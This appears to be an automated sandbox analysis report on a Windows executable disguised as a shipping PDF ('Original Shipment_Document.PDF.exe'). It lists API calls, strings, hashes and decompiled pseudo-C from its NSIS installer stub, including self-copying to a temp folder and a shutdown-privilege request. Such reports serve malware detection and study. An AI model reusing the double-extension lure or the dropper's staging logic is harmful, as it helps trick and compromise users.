                                                0x004036d7
                                                0x004036d8
                                                0x004036dc
                                                0x004036f6
                                                0x004036fd
                                                0x00403710
                                                0x00403711
                                                0x00403726
                                                0x0040372b
                                                0x0040372d
                                                0x0040372f
                                                0x0040374b
                                                0x00403752
                                                0x00403765
                                                0x00403766
                                                0x0040377b
                                                0x00403781
                                                0x00403783
                                                0x00403785
                                                0x0040378d
                                                0x0040378f
                                                0x00000000
                                                0x0040378f
                                                0x00403789
                                                0x0040378b
                                                0x004037b0
                                                0x004037b4
                                                0x004037bd
                                                0x004037c2
                                                0x004037c8
                                                0x004037d3
                                                0x004037d5
                                                0x004037da
                                                0x004037dc
                                                0x00403834
                                                0x00403839
                                                0x00403842
                                                0x00403849
                                                0x0040384c
                                                0x00403a23
                                                0x00403a23
                                                0x00403a28
                                                0x00403a31
                                                0x00403a4e
                                                0x00403ac6
                                                0x00403ac6
                                                0x00403ace
                                                0x00403ad0
                                                0x00403ad0
                                                0x00403ad6
                                                0x00403ad6
                                                0x00403a65
                                                0x00403a71
                                                0x00403a82
                                                0x00403a89
                                                0x00403a90
                                                0x00403a90
                                                0x00403a98
                                                0x00403aa4
                                                0x00403ab2
                                                0x00403abd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403aa6
                                                0x00403aa6
                                                0x00403aa7
                                                0x00403aa9
                                                0x00403aaa
                                                0x00403aab
                                                0x00403ab0
                                                0x00403abf
                                                0x00403ac1
                                                0x00000000
                                                0x00403ac1
                                                0x00000000
                                                0x00403ab0
                                                0x00403aa4
                                                0x00403a3b
                                                0x00403a42
                                                0x00403a42
                                                0x00403858
                                                0x004038ff
                                                0x004038ff
                                                0x0040390b
                                                0x00000000
                                                0x0040390b
                                                0x00403869
                                                0x00403871
                                                0x004038c3
                                                0x004038c3
                                                0x004038c9
                                                0x004038d0
                                                0x0040391e
                                                0x00403920
                                                0x00403925
                                                0x00403927
                                                0x0040392f
                                                0x0040392f
                                                0x0040393a
                                                0x0040393f
                                                0x00403946
                                                0x0040394c
                                                0x0040394e
                                                0x00403a21
                                                0x00403a21
                                                0x00403a21
                                                0x00000000
                                                0x00403954
                                                0x00403954
                                                0x00403956
                                                0x00403957
                                                0x00403960
                                                0x00403959
                                                0x00403959
                                                0x00403959
                                                0x00403966
                                                0x0040396e
                                                0x00403975
                                                0x0040397d
                                                0x0040397d
                                                0x0040398a
                                                0x00403996
                                                0x004039a0
                                                0x004039a0
                                                0x004039a2
                                                0x004039a9
                                                0x004039b3
                                                0x004039bf
                                                0x004039c5
                                                0x004039cb
                                                0x004039ce
                                                0x004039d8
                                                0x004039de
                                                0x004039e0
                                                0x004039e4
                                                0x004039f5
                                                0x004039fb
                                                0x00403a00
                                                0x00403a02
                                                0x00403a05
                                                0x00403a0b
                                                0x00403a0b
                                                0x00403a02
                                                0x004039e0
                                                0x00403a0e
                                                0x00403a15
                                                0x00403a15
                                                0x00403a15
                                                0x00403a15
                                                0x00403a1c
                                                0x00000000
                                                0x00403a1c
                                                0x0040394e
                                                0x004038d2
                                                0x004038d5
                                                0x004038d9
                                                0x004038de
                                                0x004038e0
                                                0x00000000
                                                0x00000000
                                                0x004038ec
                                                0x004038f7
                                                0x004038fc
                                                0x00000000
                                                0x004038fc
                                                0x0040387a
                                                0x00403892
                                                0x004038a3
                                                0x004038a4
                                                0x004038a8
                                                0x004038aa
                                                0x004038b8
                                                0x004038bf
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004038bf
                                                0x004038c1
                                                0x00000000
                                                0x004038c1
                                                0x004037e4
                                                0x004037f0
                                                0x004037f5
                                                0x004037fa
                                                0x004037fc
                                                0x00000000
                                                0x00000000
                                                0x00403804
                                                0x0040380c
                                                0x0040381d
                                                0x00403825
                                                0x00403827
                                                0x0040382c
                                                0x0040382e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040382e
                                                0x00000000
                                                0x0040378b
                                                0x00403734
                                                0x00403736
                                                0x00000000
                                                0x00000000
                                                0x00403738
                                                0x0040373c
                                                0x00403740
                                                0x00403747
                                                0x00403747
                                                0x00403747
                                                0x00403747
                                                0x00000000
                                                0x00403747
                                                0x00403742
                                                0x00403745
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403745
                                                0x004036de
                                                0x004036e2
                                                0x004036e5
                                                0x004036ec
                                                0x004036ec
                                                0x00000000
                                                0x004036ec
                                                0x004036e7
                                                0x004036ea
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004036ea
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004036b8
                                                0x004036b8
                                                0x004036b9
                                                0x004036ba
                                                0x004036ba
                                                0x00000000
                                                0x004036b8
                                                0x00000000

                                                APIs
                                                • SetErrorMode.KERNELBASE(00008001), ref: 0040351A
                                                • GetVersionExW.KERNEL32(?), ref: 00403543
                                                • GetVersionExW.KERNEL32(0000011C), ref: 0040355A
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
                                                • OleInitialize.OLE32(00000000), ref: 00403634
                                                • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
                                                • GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Original Shipment_Document.PDF.exe" ,00000020,"C:\Users\user\Desktop\Original Shipment_Document.PDF.exe" ,00000000), ref: 004036A0
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
                                                • DeleteFileW.KERNELBASE(1033), ref: 00403839
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403920
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040392F
                                                  • Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040393A
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Original Shipment_Document.PDF.exe" ,00000000,?), ref: 00403946
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
                                                • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Original Shipment_Document.PDF.exe,00420EC8,00000001), ref: 004039D8
                                                • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
                                                • OleUninitialize.OLE32(?), ref: 00403A28
                                                • ExitProcess.KERNEL32 ref: 00403A42
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
                                                • ExitProcess.KERNEL32 ref: 00403AD6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                • String ID: "C:\Users\user\Desktop\Original Shipment_Document.PDF.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\timelrer\Tdlen$C:\Users\user\Desktop$C:\Users\user\Desktop\Original Shipment_Document.PDF.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                • API String ID: 3859024572-354699577
                                                • Opcode ID: 55c7016762525c6a9738456634aaca118f002db87e226799c45e808ed39abf52
                                                • Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
                                                • Opcode Fuzzy Hash: 55c7016762525c6a9738456634aaca118f002db87e226799c45e808ed39abf52
                                                • Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 143 4056a8-4056c3 144 405852-405859 143->144 145 4056c9-405790 GetDlgItem * 3 call 404498 call 404df1 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405883-405890 144->147 148 40585b-40587d GetDlgItem CreateThread FindCloseChangeNotification 144->148 165 405792-4057ac SendMessageW * 2 145->165 166 4057ae-4057b1 145->166 150 405892-405898 147->150 151 4058ae-4058b8 147->151 148->147 153 4058d3-4058dc call 4044ca 150->153 154 40589a-4058a9 ShowWindow * 2 call 404498 150->154 155 4058ba-4058c0 151->155 156 40590e-405912 151->156 169 4058e1-4058e5 153->169 154->151 160 4058c2-4058ce call 40443c 155->160 161 4058e8-4058f8 ShowWindow 155->161 156->153 158 405914-40591a 156->158 158->153 167 40591c-40592f SendMessageW 158->167 160->153 163 405908-405909 call 40443c 161->163 164 4058fa-405903 call 405569 161->164 163->156 164->163 165->166 172 4057c1-4057d8 call 404463 166->172 173 4057b3-4057bf SendMessageW 166->173 174 405a31-405a33 167->174 175 405935-405960 CreatePopupMenu call 406544 AppendMenuW 167->175 182 4057da-4057ee ShowWindow 172->182 183 40580e-40582f GetDlgItem SendMessageW 172->183 173->172 174->169 180 405962-405972 GetWindowRect 175->180 181 405975-40598a TrackPopupMenu 175->181 180->181 181->174 185 405990-4059a7 181->185 186 4057f0-4057fb ShowWindow 182->186 187 4057fd 182->187 183->174 184 405835-40584d SendMessageW * 2 183->184 184->174 188 4059ac-4059c7 SendMessageW 185->188 189 405803-405809 call 404498 186->189 187->189 188->188 190 4059c9-4059ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 4059ee-405a15 SendMessageW 190->192 192->192 193 405a17-405a2b GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                C-Code - Quality: 95%
                                                			E004056A8(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429204;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E0040563C, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						FindCloseChangeNotification(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406544(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423708;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x4291ec == _t156) {
							ShowWindow( *0x42a228, 8);
							if( *0x42a2ac == _t156) {
								_t119 =  *0x4226e0; // 0x54d124
								E00405569( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E0040443C(_t171);
							goto L25;
						}
						 *0x421ed8 = 2;
						E0040443C(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004044CA(_a8, _a12, _a16);
						}
						ShowWindow( *0x4291f0, _t156);
						ShowWindow(_t169, 8);
						E00404498(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a230;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x4291f0 = GetDlgItem(_a4, 0x403);
				 *0x4291e8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429204 = _t134;
				_v8 = _t134;
				E00404498( *0x4291f0);
				 *0x4291f4 = E00404DF1(4);
				 *0x42920c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404463(_a4);
				if(( *0x42a238 & 0x00000003) != 0) {
					ShowWindow( *0x4291f0, _t156);
					if(( *0x42a238 & 0x00000002) != 0) {
						 *0x4291f0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404498( *0x4291e8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a238 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}



































                                                0x004056b0
                                                0x004056b6
                                                0x004056c0
                                                0x004056c3
                                                0x00405859
                                                0x00405876
                                                0x0040587d
                                                0x0040587d
                                                0x00405890
                                                0x004058ae
                                                0x004058b0
                                                0x004058b8
                                                0x0040590e
                                                0x00405912
                                                0x00000000
                                                0x00000000
                                                0x00405914
                                                0x0040591a
                                                0x00000000
                                                0x00000000
                                                0x00405924
                                                0x0040592c
                                                0x0040592f
                                                0x00405a31
                                                0x00000000
                                                0x00405a31
                                                0x0040593e
                                                0x00405949
                                                0x00405952
                                                0x0040595d
                                                0x00405960
                                                0x00405969
                                                0x0040596f
                                                0x00405972
                                                0x00405972
                                                0x0040598a
                                                0x00405993
                                                0x00405996
                                                0x0040599d
                                                0x004059a4
                                                0x004059ac
                                                0x004059ac
                                                0x004059c3
                                                0x004059c3
                                                0x004059ca
                                                0x004059d0
                                                0x004059dc
                                                0x004059e3
                                                0x004059ec
                                                0x004059ee
                                                0x004059f1
                                                0x00405a00
                                                0x00405a03
                                                0x00405a09
                                                0x00405a0a
                                                0x00405a10
                                                0x00405a11
                                                0x00405a12
                                                0x00405a1a
                                                0x00405a25
                                                0x00405a2b
                                                0x00405a2b
                                                0x00000000
                                                0x0040598a
                                                0x004058c0
                                                0x004058f0
                                                0x004058f8
                                                0x004058fa
                                                0x00405903
                                                0x00405903
                                                0x00405909
                                                0x00000000
                                                0x00405909
                                                0x004058c4
                                                0x004058ce
                                                0x00000000
                                                0x00405892
                                                0x00405898
                                                0x004058d3
                                                0x00000000
                                                0x004058dc
                                                0x004058a1
                                                0x004058a6
                                                0x004058a9
                                                0x00000000
                                                0x004058a9
                                                0x00405890
                                                0x004056c9
                                                0x004056cd
                                                0x004056d5
                                                0x004056d9
                                                0x004056dc
                                                0x004056df
                                                0x004056e2
                                                0x004056e5
                                                0x004056e6
                                                0x004056e7
                                                0x00405700
                                                0x00405703
                                                0x0040570d
                                                0x0040571c
                                                0x00405724
                                                0x0040572c
                                                0x00405731
                                                0x00405734
                                                0x00405740
                                                0x00405749
                                                0x00405752
                                                0x00405774
                                                0x0040577a
                                                0x0040578b
                                                0x00405790
                                                0x0040579e
                                                0x004057ac
                                                0x004057ac
                                                0x004057b1
                                                0x004057bf
                                                0x004057bf
                                                0x004057c4
                                                0x004057c7
                                                0x004057cc
                                                0x004057d8
                                                0x004057e1
                                                0x004057ee
                                                0x004057fd
                                                0x004057f0
                                                0x004057f5
                                                0x004057f5
                                                0x00405809
                                                0x00405809
                                                0x0040581d
                                                0x00405826
                                                0x0040582f
                                                0x0040583f
                                                0x0040584b
                                                0x0040584b
                                                0x00000000

                                                APIs
                                                • GetDlgItem.USER32 ref: 00405706
                                                • GetDlgItem.USER32 ref: 00405715
                                                • GetClientRect.USER32 ref: 00405752
                                                • GetSystemMetrics.USER32 ref: 00405759
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
                                                • ShowWindow.USER32(?,00000008), ref: 004057F5
                                                • GetDlgItem.USER32 ref: 00405816
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
                                                • GetDlgItem.USER32 ref: 00405724
                                                  • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                • GetDlgItem.USER32 ref: 00405868
                                                • CreateThread.KERNELBASE ref: 00405876
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040587D
                                                • ShowWindow.USER32(00000000), ref: 004058A1
                                                • ShowWindow.USER32(?,00000008), ref: 004058A6
                                                • ShowWindow.USER32(00000008), ref: 004058F0
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
                                                • CreatePopupMenu.USER32 ref: 00405935
                                                • AppendMenuW.USER32 ref: 00405949
                                                • GetWindowRect.USER32 ref: 00405969
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
                                                • OpenClipboard.USER32(00000000), ref: 004059CA
                                                • EmptyClipboard.USER32 ref: 004059D0
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
                                                • GlobalLock.KERNEL32 ref: 004059E6
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
                                                • CloseClipboard.USER32 ref: 00405A2B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 4154960007-366298937
                                                • Opcode ID: e37d3a1a711473160cce430aacecc677da03cad69d8ceec8fea621233e33ea96
                                                • Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
                                                • Opcode Fuzzy Hash: e37d3a1a711473160cce430aacecc677da03cad69d8ceec8fea621233e33ea96
                                                • Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6EAC1BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E6EAC1BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				void* _t255;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E6EAC12BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E6EAC12BB();
				_t321 = E6EAC12E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t332 = _t255;
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E6EAC13B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E6EAC162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
